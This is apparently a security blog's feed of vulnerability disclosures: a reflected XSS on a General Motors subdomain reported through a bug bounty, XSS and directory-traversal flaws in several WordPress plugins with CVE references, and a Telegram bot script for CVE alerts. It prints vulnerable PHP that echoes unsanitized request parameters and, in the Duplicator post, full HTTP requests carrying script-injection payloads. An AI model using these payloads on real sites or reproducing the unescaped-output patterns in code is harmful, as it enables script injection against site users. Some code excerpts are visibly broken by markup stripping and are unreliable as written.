SecurityTrooper

Cross Site Scripting (XSS) Reflected in one of the subdomains of “General Motors”(Bugbounty)

adm1n — Sun, 06 Dec 2020 00:24:05 +0000

In this post I show you how I found a Cross Site Scripting (XSS) Reflected in one of the subdomains of “General Motors”.

The first thing to make clear is that a company that is affiliated to a BugBounty program (hackerone.com) is allowed to analyze it. Remember that if they are not affiliated to these programs and we attack them, we can get into trouble, and we must warn them before publishing these vulnerabilities.

Another thing is that belonging to these programs means that the chances of finding some type of vulnerability are very low.

For this reason, it is advisable to search within their subdomains to increase the chances of finding any of the vulnerabilities in the OWASP Top 10:

In this case, I used the Sublist3r script (https://github.com/aboul3la/Sublist3r) to list the gm.com subdomains.

After weeks of searching, I will focus on the subdomain supply.eur.gm.com.

This subdomain caught my attention because it looks like an old website.

After making a lot of tests (users enumeration, directories listing, SQLi…) I found that it did not make a correct control of exceptions when forcing an error, moreover, this error showed me all the text contained in the URL.

Taking advantage of this error, I generated an injection of JavaScript code by not correctly filtering the values entered in the URL.

Finally, I prepared two proofs of concept to send to the BugBounty program that GM has on the web https://www.hackerone.com/

[POC 1] Payload:

[POC 2] Payload:

These XSS vulnerabilities type allow an attacker to, for example, redirect a legitimate sub-domain to a cloned website to achieve a phishing attack.

Unfortunately, the compensation for the work done by GM was zero, and this often happens.

La entrada Cross Site Scripting (XSS) Reflected in one of the subdomains of “General Motors”(Bugbounty) se publicó primero en SecurityTrooper.

Smush Image 2.7.4.1 Directory Traversal CVE-2017-15079

adm1n — Fri, 09 Feb 2018 10:48:00 +0000

I’ll talk about a Directory Traversa that I found in a well-known plugin but I have to say that it’s a bit limited because it only lists folders.
Here’s a video where I made a POC

https://securitytrooper.com/wp-content/uploads/2018/02/videoplu.mp4

I’m sorry I didn’t put more information about the code you use.

Developer’s appreciation:
https://wordpress.org/plugins/wp-smushit/#developers
Publication in Packetstormsecurity:
https://packetstormsecurity.com/files/144494/WordPress-Smush-Image-2.7.4.1-Directory-Traversal.html
CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15079

La entrada Smush Image 2.7.4.1 Directory Traversal CVE-2017-15079 se publicó primero en SecurityTrooper.

My first CVE by 2018 CVE-2018-5316

adm1n — Fri, 09 Feb 2018 10:31:53 +0000

Though the vulnerability I tracked her down last year. Mitre has decided to assign it to me this year 2018. The CVE is based on a Cross-site scripting in the plugin “SagePay Server Gateway for WooCommerce” version 1.0.7.

This vulnerability is found in the “page” parameter in the”/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect. php” file, which lacks correct filtering methods.

' .
            '' .
            '' .
            '' .
            '3D-Secure Redirect' . 
            '' .
            '' .
            '' .
            '';
            
    echo $res;
?>

The following screenshot verifies that the code is executed correctly.

Developer’s appreciation:
https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337
Publication in Packetstormsecurity:
https://packetstormsecurity.com/files/145459/WordPress-Sagepay-Server-Gateway-For-WooCommerce-1.0.7-XSS.html
CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5316

La entrada My first CVE by 2018 CVE-2018-5316 se publicó primero en SecurityTrooper.

Z-URL Preview (XSS) CVE-2017-18012

adm1n — Thu, 21 Dec 2017 08:16:14 +0000

A few days ago I finally got in touch with the developer of the plugin “Z-URL Preview” where I told him that I had a Cross-site scripting in version 1.6.1.

This vulnerability is found in the “url” parameter in the”/wp-content/plugins/z-url-preview/class. zlinkpreview. php” file which, as you can see in the following screenshot, the constructor of the “ZLinkPreview” class lacks the necessary mechanisms to prevent code injection.

url = $url;
        $this->getHTML();
    }

    function setParseMode($m = "r") {
        $this->parsemode = $m;
    }

    function getHTML() {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->url);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_CAINFO, dirname(__FILE__) . "/cacert.pem");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $this->html = curl_exec($ch);
        $this->curlinf = curl_getinfo($ch);
        $this->curlerr = curl_error($ch);
        $this->curlerrno = curl_errno($ch);

        if (!$this->html) {
            //echo 'Error: ' . curl_error($ch);
            //die();
            $this->htmlblank = true;
        }
        curl_close($ch);
//        $this->html = str_replace("", "url\">", $this->html);
    }

    function getcurlerrno() {
        echo $this->curlerrno;
    }

    function getcurlerr() {
        echo $this->curlerr;
    }

    function getcurlinf() {
        print_r($this->curlinf);
    }

    function getDescription() {
        if ($this->parsemode == "d") {
            $res = "";
            $dom = new DOMDocument();
            @$dom->loadHTML($this->html);
            foreach($dom->getElementsByTagName('meta') as $meta) {  // prefer og:description
                if ($meta->getAttribute('property') == "og:description") {
                    $res = $meta->getAttribute('content');
                    break;
                }
            }
            if ($res == "") {  // failback to basic description
                foreach($dom->getElementsByTagName('meta') as $meta) {
                    if ($meta->getAttribute('name') == "description") {
                        $res = $meta->getAttribute('content');
                        break;
                    }
                }
            }
            if ($res == "") {  // failback to first p if meta's missing or blank
                $res = $dom->getElementsByTagName('p')->item(0)->nodeValue;
            }
            echo $res;
        } else {
            if (preg_match_all('/]*name="description")\s[^>]*content="([^>]*)"/si', $this->html, $matches)) {
                foreach ($matches[1] as $key => $content) {
                    echo $content;
                }
            } else if (preg_match_all('/]*name="og:description")\s[^>]*content="([^>]*)"/si', $this->html, $matches)) {
                foreach ($matches[1] as $key => $content) {
                    echo $content;
                }
            }
        }
    }

    function getTitle() {
        if ($this->parsemode == "d") {
            $title = "";
            $dom = new DOMDocument();
            @$dom->loadHTML($this->html);
            foreach($dom->getElementsByTagName('meta') as $meta) {  // prefer og:title
                if ($meta->getAttribute('property') == "og:title") {
                    $title = $meta->getAttribute('content');
                    break;
                }
            }
            if ($title == "") {  // failback to title if og:title missing or blank
                $title = $dom->getElementsByTagName('title')->item(0)->nodeValue;
            }
            if ($title == "") {  // failback to h1 if title missing or blank
                $title = $dom->getElementsByTagName('h1')->item(0)->nodeValue;
            }
            echo $title;
        } else {
            // if (preg_match("/(.+)<\/title>/si", $this->html, $matches)) { // Changed due to issue with BBC news
            if (preg_match("/<title>(.+)<\/title>/i", $this->html, $matches)) {
                echo $matches[1];
            } else {
                $dom = new DOMDocument();
                @$dom->loadHTML($this->html);
                echo $dom->getElementsByTagName('title')->item(0)->nodeValue;
            }
        }
    }

    function getImage($multiple = false) {
        if ($this->parsemode == "d") {
                $res = "";
                $dom = new DOMDocument();
                @$dom->loadHTML($this->html);
                foreach($dom->getElementsByTagName('meta') as $meta) {  // prefer og:image
                        if ($meta->getAttribute('property') == "og:image") {
                                $res = $meta->getAttribute('content');
                                break;
                        }
                }
                if ($res == "") {  // failback to first img if og:image missing or blank
                        $res = @$dom->getElementsByTagName('img')->item(0)->getAttribute('src');
                }
                if ($res != "") {  // only try and clean up the url if an image was found
                        // we need the fqdn without the trailing /
                        $urlo = rtrim ($this->url,"/");

                        $res = preg_replace("/&#?[a-z0-9]{2,8};/i", "", $res);
                        if (substr($res, 0, 4) == "http") { // if the url starts with http we're done
                                $reso = $res;
                        } else {
                                if (substr($res, 0, 1) == "/") {  // if url starts with / then it could be an absolute path
                                        if (substr($res, 0, 2) == "//") {  // ok, not absolute, but for dual-mode http(s) sites
                                                $reso = "http:" . $res;
                                        } elseif (substr($res, 0, 3) == "://") {  // for dual-mode http(s) sites with :
                                                $reso = "http" . $res;
                                        } else {  // absolute to prepend fqdn
                                                $reso = $urlo . $res;
                                        }
                                } else {  // doesn't start with a / so a relative path - for now assume a / base path
                                        $reso = $urlo . "/" . $res;
                                }
                        }
                }
                echo $reso;
        } else {
            /* First we will check if facebook opengraph image tag exist */
            if (preg_match_all('/<meta(?=[^>]*property="og:image")\s[^>]*content="([^>]*)"/si', $this->html, $matches)) {
                foreach ($matches[1] as $key => $content) {
                    $image[] = preg_replace("/&#?[a-z0-9]{2,8};/i", "", $content);
                    if ($key == 5)
                        break;
                }
            }

            /* If not then we will get the first image from the html source */
            else if (preg_match_all('/]*src=["|\']([^"|\']+)/i', $this->html, $matches)) {
                foreach ($matches[1] as $key => $value) {
                    if (strpos($value, 'http') === false) {
                        // If trailing slash is missing from domain AND image path does not start with slash, insert one - technically should check for base href, but later :-)
                        if ((substr($this->url, -1) != "/") && (substr($value, 0, 1) != "/")) {
                            $image[] = $this->url . '/' . preg_replace("/&#?[a-z0-9]{2,8};/i", "", $value);
                        } else {
                            $image[] = $this->url . preg_replace("/&#?[a-z0-9]{2,8};/i", "", $value);
                        }
                    } else {
                        $image[] = preg_replace("/&#?[a-z0-9]{2,8};/i", "", $value);
                    }

                    if ($key == 5)
                        break;
                }
            }
            $image_index = (isset($_GET['image_no'])) ? $_GET['image_no'] - 1 : 0;
            echo (!$multiple) ? $image[$image_index] : str_replace(array("\\", "\"", " "), array("", "", ""), json_encode($image));
        }
    }

}

$zlinkPreview = new ZLinkPreview($_GET['url']);
define('SHORTINIT', true);
require_once('../../../wp-load.php');
$linkmode = get_option('zurlpreview_linkmode');
switch ($linkmode) {
    case "target-blank":
        $linkmodehtml = ' target="_blank"';
        break;
    case "target-newwindow":
        $linkmodehtml = ' target="newwindow"';
        break;
    case "rel-external":
        $linkmodehtml = ' rel="external"';
        break;
    default:
        $linkmodehtml = '';
}
$zlinkPreview->setParseMode(get_option('zurlpreview_parsemode'));
?>
<div id="at_zurlpreview">
            <?php
            if ($zlinkPreview->htmlblank == true) {
            ?>
            <p class="imgd">Error No: <?php $zlinkPreview->getcurlerrno();  ?></p>
            <p class="imgd">Error: <?php $zlinkPreview->getcurlerr();  ?></p>
            <p class="imgd">Info: <?php $zlinkPreview->getcurlinf();  ?></p>
            <?php
            } else {
            ?>
            <?php
            if (get_option('zurlpreview_noheadtag') != "Yes") {
                   if (get_option('zurlpreview_linkheader') == "Yes") {
                    ?>
                    <h2><a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><?php $zlinkPreview->getTitle();  ?></a></h2>
                    <?php
                } else {
                    ?>
                    <h2><?php $zlinkPreview->getTitle();  ?></h2>
                    <?php
                }
            }
            ?>
            <h3 style="display:none;"><?php $zlinkPreview->getTitle();  ?></h3>
            <?php
            if (get_option('zurlpreview_noimage') != "Yes") {
                   if (get_option('zurlpreview_linkimage') == "Yes") {
                    ?>
                    <p class="imgp"><a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>>getImage(1); ?>" src="<?php $zlinkPreview->getImage();  ?>"></a></p>
                    <?php
                } else {
                    ?>
                    <p class="imgp">getImage(1); ?>" src="<?php $zlinkPreview->getImage();  ?>"></p>
                    <?php
                }
            }
            if (get_option('zurlpreview_nointro') != "Yes") {
            ?>
            <p class="imgd"><?php $zlinkPreview->getDescription();  ?></p>
            <?php
            }
            if (get_option('zurlpreview_titlelink') == "Yes") {
            ?>
            <p class="imgs"><a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><?php echo htmlspecialchars($zlinkPreview->getTitle());  ?></a></p>
            <?php
            } else {
            ?>
            <p class="imgs"><?php echo get_option('zurlpreview_linktxt'); ?> <a href="<?php echo $zlinkPreview->url; ?>" <?php echo $linkmodehtml; ?>><?php echo preg_replace('#^https?://#', '', $zlinkPreview->url);  ?></a></p>
            <?php
            }
            ?>

            <?php } ?>
</div></pre>
			</div></p>
<p>The following screenshot verifies that the code is executed correctly.</p>
<p></p>
<p>The code inside the HTML body is checked in the following screenshot.</p>
<p></p>
<p> </p>
<p> </p>
<ul>
<li>Developer’s appreciation:<br />
<a href="proxy.php?url=https://wordpress.org/support/topic/z-url-preview-1-6-1-cross-site-scripting/">https://wordpress.org/support/topic/z-url-preview-1-6-1-cross-site-scripting/</a></li>
<li>Publication in Packetstormsecurity:<br />
<a href="proxy.php?url=https://packetstormsecurity.com/files/145218/WordPress-Z-URL-Preview-1.6.1-Cross-Site-Scripting.html">https://packetstormsecurity.com/files/145218/WordPress-Z-URL-Preview-1.6.1-Cross-Site-Scripting.html</a></li>
</ul>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/z-url-preview-xss-2">Z-URL Preview (XSS) CVE-2017-18012</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
<article>
<h1>Wunderbar Basic (XSS)</h1>
<p>adm1n — Wed, 20 Dec 2017 07:42:45 +0000</p>
<p>I continue found XSS into WordPress plugins, in this case the plugin is called “Wunderbar Basic” version 1.1.3.</p>
<p>The security bug is found in the “home” parameter in the”wp-content/plugins/wunderbar-basic-wysiwyyg-front-end-editor/wb-adminbar. php” file which, as can be seen in the following capture, lacks the necessary mechanisms to prevent code injection.</p>
<p><span id="more-135"></span></p>
<p><div class="snippetcpt-wrap" id="snippet-133" data-id="133" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=133" data-fullscreen="https://securitytrooper.com/code-snippets/wunderbasic?full-screen=1">
				<pre class="prettyprint linenums lang-php" title="wunderbasic"><div id="wbinterior" >
<div id="wunderbarlogo"  >
    <a class='wblogobutton thickbox' title='Wunderbar Help' href='<?php echo $_REQUEST['home']?>help.html?width=500&height=300&TB_iframe=true' target='_blank'>
        images/wb-logo-rev.png" alt="The Wunderbar" />
        <span id='wbcmds'>    HELP / UPGRADE</span>
    </a>
    </div>
<div id="fakeeditarea" style='display:none'></div></pre>
			</div></p>
<p> </p>
<p>The malicious code runs without problems.<br />
</p>
<p>This screenshot shows the code inside the HTML body.</p>
<p></p>
<ul>
<li>Publication in Packetstormsecurity:<br />
https://packetstormsecurity.com/files/145434/WordPress-Wunderbar-Basic-1.1.3-Cross-Site-Scripting.html</li>
</ul>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/wunderbar-basic-xss-2">Wunderbar Basic (XSS)</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
<article>
<h1>Pinterest Badge (XSS)</h1>
<p>adm1n — Tue, 19 Dec 2017 09:49:44 +0000</p>
<p>Today I will tell you about another Cross-site scripting that I discovered inside “Pinterest Badge” plugin version 1.8.0.</p>
<p>The security fault is found in the “uid” parameter in the”/wp-content/plugins/pinterest-badge/pinterestbadgedetails. php” file which, as can be seen in the following capture, lacks the necessary mechanisms to prevent code injection.</p>
<p></p>
<p>The malicious code runs without problems.<br />
</p>
<p>This screenshot shows the code inside the HTML body.</p>
<p></p>
<p> </p>
<ul>
<li>Publication in Packetstormsecurity:<br />
<a href="proxy.php?url=https://packetstormsecurity.com/files/145432/WordPress-Pinterest-Badge-1.8.0-Cross-Site-Scripting.html">https://packetstormsecurity.com/files/145432/WordPress-Pinterest-Badge-1.8.0-Cross-Site-Scripting.html</a></li>
</ul>
<p> </p>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/pinterest-badge-xss-2">Pinterest Badge (XSS)</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
<article>
<h1>Send the latest CVEs to your Telegram</h1>
<p>adm1n — Mon, 18 Dec 2017 11:49:42 +0000</p>
<p>In this article I will explain how to create a bot that allows you to be informed of the latest CVEs that are being published at the moment.</p>
<p>The first thing we have to do is to install our Telegram Pyhon library using pip.</p>
<pre class="lang-py prettyprint prettyprinted"><code><span class="pln">pip install python</span><span class="pun">-</span><span class="pln">telegram</span><span class="pun">-</span><span class="pln">bot</span></code></pre>
<p>For the development of our bot you have to make use of “The Botfather” (https://core.telegram.org/bots) which consists of an application created by Telegram that will act as a mediator between Telegram and our code.</p>
<p>To do this, you must access the “BotFather” channel through one of the platforms offered by Telefram (iOS, Android or Windows) or (Mac, Windows, Linux, web version).<br />
In this case, I will use your web version (https://web.telegram.org/).</p>
<p></p>
<p> </p>
<p>Once inside that channel, just put “/start” then “/newbot” and then enter the name of your bot, remember that it has to go just “_bot” or “bot”.</p>
<p></p>
<p>With the previous message, we will confirm that everything has been created correctly.<br />
It is very important that we have our Bot in contacts because you will need to know the chat_id we have in common.<br />
Surely there are ways to get this “chat_id” simpler but I will explain the one I use.</p>
<p>This Script will help you get the chat_id but for it to work you have to (previously) have talked to your bot (e. g. from the chat bot: t. me/XXXXXXXX_bot)<br />
Remember to put your TOKEN previously obtained</p>
<p><div class="snippetcpt-wrap" id="snippet-83" data-id="83" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=83" data-fullscreen="https://securitytrooper.com/code-snippets/get-chat-id-telegram?full-screen=1">
				<pre class="prettyprint linenums lang-abap" title="get-chat-id-telegram"># -*- coding: utf-8 -*-
#Importamos liberia telegram
import telegram
 
#TOKEN de la API - Botfather
TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
bot = telegram.Bot(token=TOKEN)
 
updates = bot.get_updates()
print([u.message.chat_id for u in updates])

</pre>
			</div></p>
<p>The result would be something like that:<br />
</p>
<p>The chat_id will be in the style of 17XXXXX. This chat_id can also be a negative value (e. g. -17XXXXXX).</p>
<p>Now with your chat_id and TOKEN we can use this script to get the latest CVEs that are being published via Twitter.</p>
<p><div class="snippetcpt-wrap" id="snippet-72" data-id="72" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=72" data-fullscreen="https://securitytrooper.com/code-snippets/twitter-cron?full-screen=1">
				<pre class="prettyprint linenums lang-python" title="twitter-cron"># -*- coding: utf-8 -*-
#Importamos liberia de Telegram y BeautifulSoup
import bs4,telegram

#TOKEN de la API - Botfather
TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
mi_bot = telegram.Bot(token=TOKEN)

#ID del chat de Telefram
chat_id = 1000000000000

#Nombre de la cuenta que se quiere obtener los Twits
account = "CVEnew"

#Obtenemos el contenido de de la página de twitter 
result = requests.get("https://twitter.com/"+account)
c = result.content

#Nos ayudamos la librería BeautifulSoup
soup = bs4.BeautifulSoup(c, "html.parser")

for div in soup.find_all("li", {"class":"stream-item"}):
    #Obtención de ID único que usa Twitter
    item_id = div["data-item-id"]
    
    #Se obtiene el contenido del Twitt
    content = str(div.find("p", {"class":"TweetTextSize"}).text)
    
    #Se envia el resultado a mi chat de telegram
    mi_bot.sendMessage(chat_id=chat_id, text="@" + account + " -- " + content)
</pre>
			</div></p>
<p>Remember that this Script is an example of how you get the Twits from the CVEnew channel and only collects the Twits, that is, you would need to implement a Cronjob that constantly returns these Twits and work under a database that controls the notifications received.</p>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/send-the-latest-cves-to-your-telegram">Send the latest CVEs to your Telegram</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
<article>
<h1>WP Mailster (XSS) CVE-2017-17451</h1>
<p>adm1n — Mon, 18 Dec 2017 11:45:10 +0000</p>
<p>Today I will tell you about another Cross-site scripting that I discovered the plugin “WP Mailster” version 1.5.4.0 of the company Brandtoss (<a href="proxy.php?url=https://wpmailster.com/">https://wpmailster.com/</a>)</p>
<p>The security bug is found in the month parameter in the”wp-mailster/view/subscription/unsubscribe2. php” file which, as you can see in the following screenshot, lacks the necessary mechanisms to prevent code injection.</p>
<p><span id="more-115"></span></p>
<p><div class="snippetcpt-wrap" id="snippet-65" data-id="65" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=65" data-fullscreen="https://securitytrooper.com/code-snippets/code-6?full-screen=1">
				<pre class="prettyprint linenums lang-php" title="code-6">  <h2 class="componentheading mailsterUnsubscriberHeader">Unsubscription</h2>
    <div class="contentpane">
        <div id="mailsterContainer">
            <div id="mailsterUnsubscriber">
                <div id="mailsterUnsubscriberDescription"><?php echo $_GET['mes']; ?></div>
            </div>
        </div>
    </div></pre>
			</div></p>
<p> </p>
<p>The malicious code runs without problems<br />
</p>
<p>This screenshot shows the code inside the HTML body.</p>
<p></p>
<p> </p>
<ul>
<li>Developer’s appreciation:<br />
<a href="proxy.php?url=https://wordpress.org/plugins/wp-mailster/#developers">https://wordpress.org/plugins/wp-mailster/#developers</a></li>
<li>Publication in Packetstormsecurity:<br />
<a href="proxy.php?url=https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html">https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html</a></li>
<li>CVE:<br />
<a href="proxy.php?url=http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17451">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17451</a></li>
</ul>
<p> </p>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/wp-mailster-xss-cve-2017-17451-2">WP Mailster (XSS) CVE-2017-17451</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
<article>
<h1>Emag Marketplace (XSS) CVE-2017-17043</h1>
<p>adm1n — Mon, 18 Dec 2017 11:43:14 +0000</p>
<p>A new Cross-site scripting is presented to me in the plugin “Emag Marketplace Connector” version 1.0.1 of the company Zitec (<a href="proxy.php?url=https://zitec.com/">https://zitec.com/</a>).</p>
<p><span id="more-113"></span></p>
<p>The vulnerable parameter is found in line 1 of the file “awb-meta-box. php” in the folder “/plugins/emag-marketplace-connector/tempates/order/”.</p>
<p><div class="snippetcpt-wrap" id="snippet-59" data-id="59" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=59" data-fullscreen="https://securitytrooper.com/code-snippets/code-5?full-screen=1">
				<pre class="prettyprint linenums lang-php" title="code-5"><input type="hidden" name="emkp_awb[order_id]" value="<?php echo $_GET['post']; ?>"/></pre>
			</div></p>
<p>Using this vulnerability we inject our malicious code to check if our code is actually executed.</p>
<p></p>
<p>This screenshot shows the code inside the HTML body.</p>
<p></p>
<p> </p>
<p> </p>
<ul>
<li>Developer’s appreciation:<br />
<a href="proxy.php?url=https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/">https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/</a></li>
<li>Publication in Packetstormsecurity:<br />
<a href="proxy.php?url=https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt">https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt</a></li>
<li>CVE:<br />
<a href="proxy.php?url=http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17043">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17043</a></li>
</ul>
<p> </p>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/emag-marketplace-xss-cve-2017-17043-2">Emag Marketplace (XSS) CVE-2017-17043</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
<article>
<h1>Duplicator Migration (XSS) CVE-2017-16815</h1>
<p>adm1n — Mon, 18 Dec 2017 11:40:54 +0000</p>
<p>I keep finding Cross-site scripting in wordpress plugins, I’m going to have to automate it somehow:).<br />
In this case in a plugin called “Duplicator Migration” version 1.2.28 (https://es.wordpress.org/plugins/duplicator/) which is active in more than 1 million wordpress and is developed by Snapcreek (https://snapcreek.com).<br />
It can explode using two attack vectors:<br />
<span id="more-111"></span>From the view. step4. php file:</p>
<p><div class="snippetcpt-wrap" id="snippet-52" data-id="52" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=52" data-fullscreen="https://securitytrooper.com/code-snippets/code-3?full-screen=1">
				<pre class="prettyprint linenums lang-powershell" title="code-3">POST
/wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php
HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

url_new="><script>alert(1)</script>demo</pre>
			</div></p>
<p>From the view.step2.php file:</p>
<p><div class="snippetcpt-wrap" id="snippet-53" data-id="53" data-edit="" data-copy="/en/feed?snippet=33ae2cf209&id=53" data-fullscreen="https://securitytrooper.com/code-snippets/code-4?full-screen=1">
				<pre class="prettyprint linenums lang-abap" title="code-4">POST
/wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

logging="><script>alert(1)</script>demo</pre>
			</div></p>
<p>I’m sorry I didn’t show any capture of the XSS execution but I didn’t need to do it because the Snapcreek developers didn’t ask me to.</p>
<ul>
<li>Developer’s appreciation:<br />
<a href="proxy.php?url=https://snapcreek.com/duplicator/docs/changelog">https://snapcreek.com/duplicator/docs/changelog</a> (apartado Lite)</li>
<li>Publication in Packetstormsecurity:<br />
<a href="proxy.php?url=https://packetstormsecurity.com/files/144914/WordPress-Duplicator-Migration-1.2.28-Cross-Site-Scripting.html">https://packetstormsecurity.com/files/144914/WordPress-Duplicator-Migration-1.2.28-Cross-Site-Scripting.html</a></li>
<li>CVE:<br />
<a href="proxy.php?url=https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16815">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16815</a></li>
</ul>
<p>La entrada <a href="proxy.php?url=https://securitytrooper.com/en/duplicator-migration-xss-cve-2017-16815-2">Duplicator Migration (XSS) CVE-2017-16815</a> se publicó primero en <a href="proxy.php?url=https://securitytrooper.com/en">SecurityTrooper</a>.</p>

</article>
</main></body></html>